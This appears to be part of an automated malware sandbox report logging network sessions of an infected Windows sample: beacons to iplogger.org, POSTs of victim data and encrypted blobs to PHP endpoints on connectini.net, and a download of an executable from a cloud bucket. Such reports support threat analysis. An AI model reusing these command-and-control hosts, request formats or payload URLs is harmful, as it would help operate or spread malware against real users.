                                                                                                                          2022-05-21 07:33:07 UTC3346INData Raw: 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49
                                                                                                                          Data Ascii: GPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI
                                                                                                                          2022-05-21 07:33:07 UTC3348INData Raw: 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47
                                                                                                                          Data Ascii: XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDING
                                                                                                                          2022-05-21 07:33:07 UTC3349INData Raw: 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47
                                                                                                                          Data Ascii: ADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
                                                                                                                          2022-05-21 07:33:07 UTC3350INData Raw: 2c 3e 34 3e 4b 3e 64 3e 80 3e 89 3e 8f 3e 98 3e 9d 3e ac 3e d3 3e fc 3e 0d 3f 21 3f 27 3f 2e 3f 3b 3f 42 3f 48 3f 50 3f 56 3f 62 3f 67 3f 00 40 00 00 9c 00 00 00 a8 31 b6 31 bc 31 d6 31 db 31 ea 31 f3 31 00 32 0b 32 1d 32 30 32 3b 32 41 32 47 32 4c 32 55 32 72 32 78 32 83 32 88 32 90 32 96 32 a0 32 a7 32 bb 32 c2 32 c8 32 d6 32 dd 32 e2 32 eb 32 f8 32 fe 32 18 33 29 33 2f 33 40 33 a3 33 3b 37 47 37 7a 37 a0 37 da 37 1f 38 f2 39 fd 39 05 3a 1a 3a 2c 3a 77 3a 81 3a a2 3a da 3a e8 3a 2c 3b 88 3b 9d 3b e3 3b e9 3b f5 3b 4a 3c 7d 3c b5 3c 20 3d 26 3d 77 3d 7d 3d a1 3d c4 3d f8 3d fe 3d 0a 3e 51 3e ea 3f 00 50 00 00 e8 00 00 00 1f 30 38 30 3f 30 47 30 4c 30 50 30 54 30 7d 30 a3 30 c1 30 c8 30 cc 30 d0 30 d4 30 d8 30 dc 30 e0 30 e4 30 2e 31 34 31 38 31 3c 31 40
                                                                                                                          Data Ascii: ,>4>K>d>>>>>>>>>?!?'?.?;?B?H?P?V?b?g?@111111122202;2A2G2L2U2r2x22222222222222223)3/3@33;7G7z777899::,:w:::::,;;;;;;J<}<< =&=w=}=====>Q>?P080?0G0L0P0T0}00000000000.14181<1@
                                                                                                                          2022-05-21 07:33:07 UTC3351INData Raw: 61 30 62 0d 0a 39 00 00 00 80 00 00 14 00 00 00 00 31 04 31 08 31 0c 31 2c 31 30 31 00 90 00 00 44 00 00 00 44 32 48 32 84 32 88 32 a8 32 c8 32 e8 32 f4 32 10 33 2c 33 30 33 50 33 70 33 8c 33 90 33 ac 33 b0 33 d0 33 ec 33 f0 33 10 34 30 34 50 34 70 34 90 34 b0 34 d0 34 ec 34 f0 34 00 00 00 a0 00 00 e0 00 00 00 08 30 cc 30 d4 30 dc 30 e4 30 ec 30 f4 30 fc 30 04 31 0c 31 14 31 1c 31 24 31 2c 31 34 31 3c 31 44 31 4c 31 54 31 5c 31 64 31 6c 31 74 31 7c 31 10 34 14 34 18 34 1c 34 20 34 24 34 28 34 2c 34 30 34 34 34 38 34 a0 34 b0 34 c0 34 d0 34 e0 34 04 35 10 35 14 35 18 35 1c 35 20 35 28 35 2c 35 58 39 54 3a 58 3a 60 3a 64 3a 68 3a 6c 3a 70 3a 74 3a 78 3a 7c 3a 80 3a 84 3a 88 3a 8c 3a 90 3a 94 3a 98 3a 9c 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0
                                                                                                                          Data Ascii: a0b91111,101DD2H22222223,303P3p33333333404P4p444444000000001111$1,141<1D1L1T1\1d1l1t1|14444 4$4(4,40444844444455555 5(5,5X9T:X:`:d:h:l:p:t:x:|:::::::::::::::::
                                                                                                                          2022-05-21 07:33:07 UTC3352INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2022-05-21 07:33:07 UTC3354INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          28192.168.2.44987237.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:06 UTC3326OUTPOST /Series/za3ma_za3ma.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Host: connectini.net
                                                                                                                          Content-Length: 164
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:33:06 UTC3326INHTTP/1.1 100 Continue
                                                                                                                          2022-05-21 07:33:06 UTC3326OUTData Raw: 6e
                                                                                                                          Data Ascii: n
                                                                                                                          2022-05-21 07:33:06 UTC3326OUTData Raw: 63 68 61 6c 6c 61 68 54 65 35 64 65 6d 3d 7b 22 63 72 65 61 74 69 6f 6e 44 61 74 65 54 69 6d 65 22 3a 22 32 30 32 32 2d 30 35 2d 32 31 20 30 39 3a 33 33 3a 30 34 22 2c 22 43 75 72 72 65 6e 74 44 61 74 65 22 3a 22 32 30 32 32 2d 30 35 2d 32 31 20 30 39 3a 33 33 3a 30 36 22 2c 22 6e 62 72 65 44 61 79 22 3a 30 2c 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 70 61 72 74 6e 65 72 4e 61 6d 65 22 3a 22 70 77 6f 66 66 32 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 22 70 77 6f 66 66 63 68 32 22 7d
                                                                                                                          Data Ascii: challahTe5dem={"creationDateTime":"2022-05-21 09:33:04","CurrentDate":"2022-05-21 09:33:06","nbreDay":0,"country":"CH","partnerName":"pwoff2","channel":"pwoffch2"}
                                                                                                                          2022-05-21 07:33:07 UTC3354INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          4
                                                                                                                          true
                                                                                                                          0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          29192.168.2.44987337.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:07 UTC3354OUTPOST /Series/scofild1.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Host: connectini.net
                                                                                                                          Content-Length: 97
                                                                                                                          Expect: 100-continue
                                                                                                                          2022-05-21 07:33:07 UTC3354INHTTP/1.1 100 Continue
                                                                                                                          2022-05-21 07:33:07 UTC3354OUTData Raw: 6d
                                                                                                                          Data Ascii: m
                                                                                                                          2022-05-21 07:33:07 UTC3354OUTData Raw: 61 72 79 63 72 75 7a 3d 65 46 39 46 54 37 64 72 6d 77 33 4e 33 74 62 7a 70 41 56 65 43 65 79 66 31 6a 4e 68 6e 43 2b 35 6e 72 64 43 34 4b 65 36 54 79 4b 51 62 42 56 69 43 77 76 73 6e 2f 71 61 4e 62 47 50 58 68 67 38 59 32 63 68 52 55 51 74 55 6a 6f 76 71 76 59 72 78 7a 67 43 6e 67 3d 3d
                                                                                                                          Data Ascii: arycruz=eF9FT7drmw3N3tbzpAVeCeyf1jNhnC+5nrdC4Ke6TyKQbBViCwvsn/qaNbGPXhg8Y2chRUQtUjovqvYrxzgCng==
                                                                                                                          2022-05-21 07:33:07 UTC3354INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:07 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2c
                                                                                                                          0Ko7RWbWJACaPAxySlJFbL/mfUCa5KhPgy22wx+tPaA=
                                                                                                                          0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.44979137.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:04 UTC612OUTPOST /Series/SuperNitouDisc.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Host: connectini.net
                                                                                                                          Content-Length: 51
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:04 UTC613INHTTP/1.1 100 Continue
                                                                                                                          2022-05-21 07:32:04 UTC613OUTData Raw: 4c
                                                                                                                          Data Ascii: L
                                                                                                                          2022-05-21 07:32:04 UTC613OUTData Raw: 79 6f 75 76 69 3d 38 2b 4c 77 65 43 32 69 59 36 6c 62 31 30 39 45 2b 6e 6e 6e 43 4e 74 4e 71 35 48 76 6f 79 71 73 73 2b 69 50 73 75 75 35 5a 31 34 3d
                                                                                                                          Data Ascii: youvi=8+LweC2iY6lb109E+nnnCNtNq5Hvoyqss+iPsuu5Z14=
                                                                                                                          2022-05-21 07:32:04 UTC613INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:04 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          680
                                                                                                                          wzX9vS+zMw/iCGIvStHiNATpct0w/5PYk58d/qDeLv91yW3gKbZnM+l5iZWTfvQJzvio3I9x3w68KuwxQfxKbt4UK5sTpDW1cvd3qH437mLaw+aqcwvrD7mACRlPf0eG9I3SL6s4U+3X4IJ7dz7W5y7LWW7E6qH/fEj6juUkR6wG7oq2ThTU+XC5Z3EBiywNFyWTBzclVqROxfviJm7cgBhJ5azS0BVij+bXnWLVYon36E7o+yUfFsron5SHe4YVIp5TLlZ+d3ayDbq3xtidBV9Kb64zBvLZ9t4jiaUCvppCq6zpilwBOr7CHqQYWkNevLnV4IRf1144lZFvjN+i8vR3KdJGc+U2CBykmqeiekfHHFsc7c7ZwSh9FHtzdn3Nt1qdtu6AEOu8KlI4by7egFIqlDBX8ssa9hBHIMtnGxmZjTOI+8vGLjNq9iP5SafyMq3jyH4vmdhl7RV56MqhNpK05TDQLDLI21HDP1xrhwqxlajY2+HSNp4T4Va6pnyildmAHMsM1jH+//u7+lFE0MEFfMOF5WZd5nU9AbC9CdpsKXNsYXkkvgd+H9swLPSfrs3StfXnVeDCZxoYtGCMYRvO2dB/ble0AFBBZmtvv7HoQM1xdAI+zbYh/ffQMt5LiAi7Yqzac/JtkEkFnfaRDA28IA6yHJrafhrbCkzNqnqDfaVa3CCfPk3Rc/yL+9jA1W92I1ZxirSr0btSCfA+xVU5BFJq1xwQUE/4KYxnX7IdnAFG3Xvy8MUA+mUSQy+jpeFy4NU3K86xsKw56gygOJUN+TjtaPun0oHpuaG1mMga1CbEOUYo8/PpTpW0SxExBF0jwMxIAi5d8loCwk6015gWZgMasqgKDikc4aq6vd3Vz1xjFJVVVU6YRL32cHwHSjug+5SJcPotCB2Nbp8A2gF6vPRs7BCWVjUX7Oz5g53HvE7qWEiyJ72GYkU3PlOKu8QDqCK4g5VE19B0xdX+fj2i5wPxLIB27FHT//kzj0A6fjxqiVCQDIps00V9uZgUM7P7tKcDh0La7gzUN0ifuRi7AWhLYzLEScwdvfQFBAvxHao0fjIv89H7vPYP77Kt8arLY/76L7DRaQz/FWDjOozxf5FFvpwbFP/fLixUVBrj6iXaROEV6CMbm81ond2u8zWXrt4a3g+AI2FJuy4NDO1WQNyvgsAzOKZjZD/hzLmwd/BXo85iG0Dh1Hu+niGxuQ0ZcgJnlOslQSsMUrr2QHHljXtViRYHHPQJa+BYdP5rc5pX2+fBu9rOJWdRZ7r0IpLi1nr138WxENcqKXY6aB9aN0wZEu38jpwVE60GGQcFyrlq59zv2aBSz57ETKZaOGmGisk44j0MfJn4+DsVdblf4hQ8m1BAU8Ky80vVkD7AoACkfBaC05vtnI5VAE66c1u+5mvFlxOM6FXJ+r6Mx2uJWaWZIq/rPbjttiG0kk93KFxN21EhPStGbWWDnRVhZVScaz3l5DPm9dZxP8ImSZvCELxRKcNXnrEvqsk382NxZ3kteRHGW8BFpvvf5wUOkfJUO6ux62qERlT+DNz6sSqVTpt/rIHd6/pSy1e8SGhnL+XbwPWVHm6Uweb59Q5decyRX7rT7WMVK5f+JAHOODYUG3nRkESjdOksUd8NA2RlE2kdro0zw/gbbR6wmiu1
                                                                                                                          0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          30192.168.2.449874148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:07 UTC3354OUTGET /1L7Vh7 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          2022-05-21 07:33:07 UTC3354INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:07 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:33:07 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 320663801410413587=3; expires=Sun, 21-May-2023 07:33:07 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:33:07 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:33:07 UTC3355INData Raw: 31 32 31 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4
                                                                                                                          Data Ascii: 121Notice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          31192.168.2.449880148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:15 UTC3355OUTGET /2AqfG6 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2022-05-21 07:33:15 UTC3355INHTTP/1.1 302 Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:15 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:33:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 372663261410413587=3; expires=Sun, 21-May-2023 07:33:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:33:15 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Location: https://www.google.com/
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:33:15 UTC3356INData Raw: 61 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: adNotice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 160


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          32192.168.2.449883148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:33:18 UTC3356OUTGET /1RaBg7 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/515.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
                                                                                                                          Host: iplogger.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:33:18 UTC3356INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:33:18 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:33:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 371457491410413587=3; expires=Sun, 21-May-2023 07:33:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:33:18 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:33:18 UTC3357INData Raw: 63 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cdNotice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          33192.168.2.449946148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:34:04 UTC3357OUTGET /1Pz8p7 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1
                                                                                                                          Host: iplogger.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:34:04 UTC3357INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:34:04 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:34:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 333625791410413587=3; expires=Sun, 21-May-2023 07:34:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:34:04 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:34:04 UTC3358INData Raw: 63 64 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cdNotice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.449796151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:23 UTC614OUTGET /ultimate/publish-gcdexh7kcw9xhrx4.exe HTTP/1.1
                                                                                                                          Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:24 UTC615INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 477184
                                                                                                                          x-amz-id-2: tx987b8830c24f4b46bb92e-0062889587
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Thu, 05 May 2022 23:04:53 GMT
                                                                                                                          ETag: "17a1cf47a7aba5f25212db7f8bb8d23f"
                                                                                                                          x-amz-request-id: tx987b8830c24f4b46bb92e-0062889587
                                                                                                                          x-amz-version-id: 1651791893679722
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                          Date: Sat, 21 May 2022 07:32:24 GMT
                                                                                                                          Connection: close
